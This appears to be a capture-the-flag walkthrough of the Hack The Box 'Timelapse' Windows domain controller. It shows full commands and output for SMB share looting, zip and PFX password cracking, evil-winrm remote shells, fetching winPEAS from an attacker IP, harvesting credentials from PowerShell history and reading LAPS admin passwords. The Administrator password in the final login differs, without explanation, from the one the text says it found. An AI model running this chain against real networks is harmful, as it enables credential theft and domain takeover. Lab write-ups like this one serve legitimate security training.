Home HTB Timelapse Walktrough
Post
Cancel

HTB Timelapse Walktrough

Scan and Enumeration


Let’s start doing a nmap scan. These are the results I obtained:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
Nmap scan report for 10.10.11.152
Host is up (0.11s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-07-05 16:08:19Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open  globalcatLDAPssl?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h59m56s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-07-05T16:08:37
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   108.19 ms 10.10.14.1
2   108.51 ms 10.10.11.152

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.56 seconds

We can see that it has some interesting open ports such as kerberos (88), dns (53), ldap (389) and SMB (445). We can assume we are against a Windows DC machine because of the services offered.

The next thing I tried was checking some public SMB shares:

1
2
3
4
5
6
7
8
9
10
11
12
❯ smbclient --no-pass -L //10.10.11.152
Can't load /etc/samba/smb.conf - run testparm to debug it

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	Shares          Disk      
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

And then I tried to check if I had access to them. I was able to access the Shares share and list its content:

1
2
3
4
5
6
7
8
9
10
11
12
❯ smbclient //10.10.11.152/Shares
Can't load /etc/samba/smb.conf - run testparm to debug it
Password for [WORKGROUP\adri]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 15:39:15 2021
  ..                                  D        0  Mon Oct 25 15:39:15 2021
  Dev                                 D        0  Mon Oct 25 19:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 15:48:42 2021

		6367231 blocks of size 4096. 2062817 blocks available
smb: \> 

I first downloaded the backup file found inside Dev:

1
2
3
4
5
6
7
8
smb: \Dev\> ls
  .                                   D        0  Mon Oct 25 19:40:06 2021
  ..                                  D        0  Mon Oct 25 19:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 15:46:42 2021

		6367231 blocks of size 4096. 2085105 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (5.9 KiloBytes/sec) (average 5.9 KiloBytes/sec)

Then I downloaded the other interesting files to inspect them later:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
smb: \HelpDesk\> ls
  .                                   D        0  Mon Oct 25 15:48:42 2021
  ..                                  D        0  Mon Oct 25 15:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 14:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 14:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 14:57:40 2021
  LAPS_TechnicalSpecification.docx      A    72683  Mon Oct 25 14:57:44 2021

		6367231 blocks of size 4096. 2110122 blocks available
smb: \HelpDesk\> get LAPS_Datasheet.docx 
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as LAPS_Datasheet.docx (161.1 KiloBytes/sec) (average 98.1 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_OperationsGuide.docx 
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as LAPS_OperationsGuide.docx (669.2 KiloBytes/sec) (average 365.1 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_TechnicalSpecification.docx 
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as LAPS_TechnicalSpecification.docx (162.1 KiloBytes/sec) (average 328.6 KiloBytes/sec)

Brute Forcing


This .docx documents contain information about LAPS. The next step I took was to unzip the backup file and check for more sensitive information. However, the file inside this zip was protected by a password. I used Arch Linux and I had an issue cracking this .zip file so I had to download it from Parrot Linux and I used fcrackzip to find the password:

1
2
3
4
$ fcrackzip -D -v -u -p /usr/share/wordlists/rockyou.txt ./winrm_backup.zip


PASWORD FOUND!!!!: pwd == supremelegacy

Now we can unzip it and we can see that there is a .pfx file inside it. A .pfx file contains a SSL certificate and the corresponding private keys:

1
2
3
4
5
6
7
❯ unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 
  inflating: legacyy_dev_auth.pfx    
❯ ls
 LAPS_Datasheet.docx         LAPS_TechnicalSpecification.docx   walkthrough.md   
 LAPS_OperationsGuide.docx   legacyy_dev_auth.pfx 

I wanted to extract the private key using this openssl command: openssl pkcs12 -in legacy_dev_auth.pfx -nocerts -out priv-key.pem -nodes but it required another password. After googling a bit, I decided to try with the crackpkcs12 tool and rockyou.txt to bruteforce the password again:

1
2
3
4
5
6
7
8
crackpkcs12 -d /home/adri/Desktop/adri/utils/rockyou.txt -v legacyy_dev_auth.pfx

Dictionary attack - Starting 2 threads

Performance:              3232878 passwords [   11732 passwords per second]
*********************************************************
Dictionary attack - Thread 2 - Password found: thuglegacy
*********************************************************

Now we can extract the private key and read it:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
❯ openssl pkcs12 -in certname.pfx -nocerts -out key.pem -nodes
Can't open certname.pfx for reading, No such file or directory
140137388039040:error:02001002:system library:fopen:No such file or directory:crypto/bio/bss_file.c:69:fopen('certname.pfx','rb')
140137388039040:error:2006D080:BIO routines:BIO_new_file:no such file:crypto/bio/bss_file.c:76:
❯ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.pem -nodes
Enter Import Password:
❯ ls
 key.pem               LAPS_OperationsGuide.docx          legacyy_dev_auth.pfx   winrm_backup.zip
 LAPS_Datasheet.docx   LAPS_TechnicalSpecification.docx   walkthrough.md         zip.hash
❯ cat key.pem
───────┬────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: key.pem
───────┼────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ Bag Attributes
   2   │     Microsoft Local Key set: <No Values>
   3   │     localKeyID: 01 00 00 00 
   4   │     friendlyName: te-4a534157-c8f1-4724-8db6-ed12f25c2a9b
   5   │     Microsoft CSP Name: Microsoft Software Key Storage Provider
   6   │ Key Attributes
   7   │     X509v3 Key Usage: 90 
   8   │ -----BEGIN PRIVATE KEY-----
   9   │ MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQClVgejYhZHHuLz
  10   │ TSOtYXHOi56zSocr9om854YDu/6qHBa4Nf8xFP6INNBNlYWvAxCvKM8aQsHpv3to
  11   │ pwpQ+YbRZDu1NxyhvfNNTRXjdFQV9nIiKkowOt6gG2F+9O5gVF4PAnHPm+YYPwsb
  12   │ oRkYV8QOpzIi6NMZgDCJrgISWZmUHqThybFW/7POme1gs6tiN1XFoPu1zNOYaIL3
  13   │ dtZaazXcLw6IpTJRPJAWGttqyFommYrJqCzCSaWu9jG0p1hKK7mk6wvBSR8QfHW2
  14   │ qX9+NbLKegCt+/jAa6u2V9lu+K3MC2NaSzOoIi5HLMjnrujRoCx3v6ZXL0KPCFzD
  15   │ MEqLFJHxAgMBAAECggEAc1JeYYe5IkJY6nuTtwuQ5hBc0ZHaVr/PswOKZnBqYRzW
  16   │ fAatyP5ry3WLFZKFfF0W9hXw3tBRkUkOOyDIAVMKxmKzguK+BdMIMZLjAZPSUr9j
  17   │ PJFizeFCB0sR5gvReT9fm/iIidaj16WhidQEPQZ6qf3U6qSbGd5f/KhyqXn1tWnL
  18   │ GNdwA0ZBYBRaURBOqEIFmpHbuWZCdis20CvzsLB+Q8LClVz4UkmPX1RTFnHTxJW0
  19   │ Aos+JHMBRuLw57878BCdjL6DYYhdR4kiLlxLVbyXrP+4w8dOurRgxdYQ6iyL4UmU
  20   │ Ifvrqu8aUdTykJOVv6wWaw5xxH8A31nl/hWt50vEQQKBgQDYcwQvXaezwxnzu+zJ
  21   │ 7BtdnN6DJVthEQ+9jquVUbZWlAI/g2MKtkKkkD9rWZAK6u3LwGmDDCUrcHQBD0h7
  22   │ tykwN9JTJhuXkkiS1eS3BiAumMrnKFM+wPodXi1+4wJk3YTWKPKLXo71KbLo+5NJ
  23   │ 2LUmvvPDyITQjsoZoGxLDZvLFwKBgQDDjA7YHQ+S3wYk+11q9M5iRR9bBXSbUZja
  24   │ 8LVecW5FDH4iTqWg7xq0uYnLZ01mIswiil53+5Rch5opDzFSaHeS2XNPf/Y//TnV
  25   │ 1+gIb3AICcTAb4bAngau5zm6VSNpYXUjThvrLv3poXezFtCWLEBKrWOxWRP4JegI
  26   │ ZnD1BfmQNwKBgEJYPtgl5Nl829+Roqrh7CFti+a29KN0D1cS/BTwzusKwwWkyB7o
  27   │ btTyQf4tnbE7AViKycyZVGtUNLp+bME/Cyj0c0t5SsvS0tvvJAPVpNejjc381kdN
  28   │ 71xBGcDi5ED2hVj/hBikCz2qYmR3eFYSTrRpo15HgC5NFjV0rrzyluZRAoGAL7s3
  29   │ QF9Plt0jhdFpixr4aZpPvgsF3Ie9VOveiZAMh4Q2Ia+q1C6pCSYk0WaEyQKDa4b0
  30   │ 6jqZi0B6S71un5vqXAkCEYy9kf8AqAcMl0qEQSIJSaOvc8LfBMBiIe54N1fXnOeK
  31   │ /ww4ZFfKfQd7oLxqcRADvp1st2yhR7OhrN1pfl8CgYEAsJNjb8LdoSZKJZc0/F/r
  32   │ c2gFFK+MMnFncM752xpEtbUrtEULAKkhVMh6mAywIUWaYvpmbHDMPDIGqV7at2+X
  33   │ TTu+fiiJkAr+eTa/Sg3qLEOYgU0cSgWuZI0im3abbDtGlRt2Wga0/Igw9Ewzupc8
  34   │ A5ZZvI+GsHhm0Oab7PEWlRY=
  35   │ -----END PRIVATE KEY-----
───────┴────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

We can also extract the certificate and read the content by doing this other openssl command:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
❯ openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out cert.pem
Enter Import Password:
❯ ls
 cert.pem   LAPS_Datasheet.docx         LAPS_TechnicalSpecification.docx   walkthrough.md     zip.hash
 key.pem    LAPS_OperationsGuide.docx   legacyy_dev_auth.pfx               winrm_backup.zip  
❯ cat cert.pem
───────┬────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: cert.pem
───────┼────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ Bag Attributes
   2   │     localKeyID: 01 00 00 00 
   3   │ subject=CN = Legacyy
   4   │ 
   5   │ issuer=CN = Legacyy
   6   │ 
   7   │ -----BEGIN CERTIFICATE-----
   8   │ MIIDJjCCAg6gAwIBAgIQHZmJKYrPEbtBk6HP9E4S3zANBgkqhkiG9w0BAQsFADAS
   9   │ MRAwDgYDVQQDDAdMZWdhY3l5MB4XDTIxMTAyNTE0MDU1MloXDTMxMTAyNTE0MTU1
  10   │ MlowEjEQMA4GA1UEAwwHTGVnYWN5eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC
  11   │ AQoCggEBAKVWB6NiFkce4vNNI61hcc6LnrNKhyv2ibznhgO7/qocFrg1/zEU/og0
  12   │ 0E2Vha8DEK8ozxpCwem/e2inClD5htFkO7U3HKG9801NFeN0VBX2ciIqSjA63qAb
  13   │ YX707mBUXg8Ccc+b5hg/CxuhGRhXxA6nMiLo0xmAMImuAhJZmZQepOHJsVb/s86Z
  14   │ 7WCzq2I3VcWg+7XM05hogvd21lprNdwvDoilMlE8kBYa22rIWiaZismoLMJJpa72
  15   │ MbSnWEoruaTrC8FJHxB8dbapf341ssp6AK37+MBrq7ZX2W74rcwLY1pLM6giLkcs
  16   │ yOeu6NGgLHe/plcvQo8IXMMwSosUkfECAwEAAaN4MHYwDgYDVR0PAQH/BAQDAgWg
  17   │ MBMGA1UdJQQMMAoGCCsGAQUFBwMCMDAGA1UdEQQpMCegJQYKKwYBBAGCNxQCA6AX
  18   │ DBVsZWdhY3l5QHRpbWVsYXBzZS5odGIwHQYDVR0OBBYEFMzZDuSvIJ6wdSv9gZYe
  19   │ rC2xJVgZMA0GCSqGSIb3DQEBCwUAA4IBAQBfjvt2v94+/pb92nLIS4rna7CIKrqa
  20   │ m966H8kF6t7pHZPlEDZMr17u50kvTN1D4PtlCud9SaPsokSbKNoFgX1KNX5m72F0
  21   │ 3KCLImh1z4ltxsc6JgOgncCqdFfX3t0Ey3R7KGx6reLtvU4FZ+nhvlXTeJ/PAXc/
  22   │ fwa2rfiPsfV51WTOYEzcgpngdHJtBqmuNw3tnEKmgMqp65KYzpKTvvM1JjhI5txG
  23   │ hqbdWbn2lS4wjGy3YGRZw6oM667GF13Vq2X3WHZK5NaP+5Kawd/J+Ms6riY0PDbh
  24   │ nx143vIioHYMiGCnKsHdWiMrG2UWLOoeUrlUmpr069kY/nn7+zSEa2pA
  25   │ -----END CERTIFICATE-----
───────┴────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

Obtaining the User Flag


I got stuck here for quite a long time. After googling a bit I saw that windows winrm runs on port 5985 and I didn’t scan all ports when doing my nmap. I decided to run my nmap again with the -p- option and I saw that this service was running with ssl:

1
2
3
4
5
6
7
8
9
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2022-07-05T20:40:19+00:00; +7h59m58s from scanner time.
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
| tls-alpn: 
|_  http/1.1
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0

Then I used evil-winrm to log in using this key and cert files and I was able to obtain the user flag at the user Desktop:

1
2
3
4
5
6
7
8
9
10
ruby /home/adri/Desktop/adri/utils/evil-winrm/evil-winrm.rb -S -i 10.10.11.152 -c cert.pem -k key.pem

Evil-WinRM shell v3.4

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy

Privilege Escalation


To start with the privilege escalation I created an http server using python at the same location as winPEASx64.exe and, inside the windows machine, I uploaded the executable using the Invoke-WebRequest cmdlet (IWR) using my IP inside the VPN:

1
*Evil-WinRM* PS C:\Users\legacyy\Documents> IWR http://10.10.14.63:8000/winPEASx64.exe -OutFile winPEASx64.exe

After executing it, I saw that there was a Powershell command history located at C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt:

1
2
3
4
5
6
7
8
9
ÉÍÍÍÍÍÍÍÍÍ͹ PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.17763.1
    PowerShell Core Version: 
    Transcription Settings: 
    Module Logging Settings: 
    Scriptblock Logging Settings: 
    PS history file: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    PS history size: 434B

If we check the history file we can see some interesting commands that involve a password that we can see when $p is defined.

1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> cat "C:/Users/legacyy/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt"
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

I tried to log on using that account and password without succeeding. However, as we can see in the history files, we can repeat the commands and execute as the svc_deploy user by invoking commands. I decided to check the differences between the legacyy user and the svc_deploy user and I saw that the last one has the privilege to read the LAPS. Since we found some information about LAPS before, I decided to follow that path.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
*Evil-WinRM* PS C:\Users\legacyy\Documents> net user svc_deploy
User name                    svc_deploy
Full Name                    svc_deploy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/25/2021 12:12:37 PM
Password expires             Never
Password changeable          10/26/2021 12:12:37 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/6/2022 7:15:13 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *LAPS_Readers         *Domain Users
The command completed successfully.

After some googling I tried to use the Get-AdmPassword using the computer name of the host (which you can get using the hostname command) but it didn’t worked:

1
2
3
4
5
*Evil-WinRM* PS C:\Users\legacyy\Documents> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Get-AdmPwdPassword -ComputerName dc01}
The term 'Get-AdmPwdPassword' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

    + CategoryInfo          : ObjectNotFound: (Get-AdmPwdPassword:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

After more googling, I saw that if you have permission to read the LAPS, you can see the password by checking the Computer attributes because LAPS adds a new attribute named ms-Mcs-AdmPwd with the password. After running this command and checking the output, I was able to find an admin password (3i92{K87u45/SPb&63OUm9nL):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
*Evil-WinRM* PS C:\Users\legacyy\Documents> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Get-ADComputer -LDAPFilter "(name=*DC01*)" -Properties *}


PSComputerName                       : localhost
RunspaceId                           : 316249f0-9ceb-44c6-9e35-7d1bd3f63c3f
AccountExpirationDate                :
accountExpires                       : 9223372036854775807
AccountLockoutTime                   :
AccountNotDelegated                  : False
AllowReversiblePasswordEncryption    : False
AuthenticationPolicy                 : {}
AuthenticationPolicySilo             : {}
BadLogonCount                        : 0
badPasswordTime                      : 0
badPwdCount                          : 0
CannotChangePassword                 : False
CanonicalName                        : timelapse.htb/Domain Controllers/DC01
Certificates                         : {}
CN                                   : DC01
codePage                             : 0
CompoundIdentitySupported            : {False}
countryCode                          : 0
Created                              : 10/23/2021 11:40:55 AM
createTimeStamp                      : 10/23/2021 11:40:55 AM
Deleted                              :
Description                          :
DisplayName                          :
DistinguishedName                    : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName                          : dc01.timelapse.htb
DoesNotRequirePreAuth                : False
dSCorePropagationData                : {10/25/2021 9:03:33 AM, 10/25/2021 9:03:33 AM, 10/23/2021 11:40:55 AM, 1/1/1601 10:16:33 AM}
Enabled                              : True
HomedirRequired                      : False
HomePage                             :
instanceType                         : 4
IPv4Address                          : 10.10.11.152
IPv6Address                          : dead:beef::20d
isCriticalSystemObject               : True
isDeleted                            :
KerberosEncryptionType               : {RC4, AES128, AES256}
LastBadPasswordAttempt               :
LastKnownParent                      :
lastLogoff                           : 0
lastLogon                            : 133016279609409837
LastLogonDate                        : 7/6/2022 5:38:38 PM
lastLogonTimestamp                   : 133016279187691001
localPolicyFlags                     : 0
Location                             :
LockedOut                            : False
logonCount                           : 138
ManagedBy                            :
MemberOf                             : {}
MNSLogonAccount                      : False
Modified                             : 7/6/2022 5:39:05 PM
modifyTimeStamp                      : 7/6/2022 5:39:05 PM
ms-Mcs-AdmPwd                        : 3i92{K87u45/SPb&63OUm9nL
ms-Mcs-AdmPwdExpirationTime          : 133020599453159751
msDFSR-ComputerReferenceBL           : {CN=DC01,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=timelapse,DC=htb}
msDS-GenerationId                    : {209, 176, 121, 109...}
msDS-SupportedEncryptionTypes        : 28
msDS-User-Account-Control-Computed   : 0

Then I used these credentials to log on as a Local Admin and retrieve the root flag:

1
2
3
4
5
6
7
8
9
ruby /home/adri/Desktop/adri/utils/evil-winrm/evil-winrm.rb -u Administrator -p 'i{dQA#a.I7Zx,CW!74NUAm63' -i 10.10.11.152 -S

Evil-WinRM shell v3.4

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..

I had to search for the root flag using the dir command.

This post is licensed under CC BY 4.0 by the author.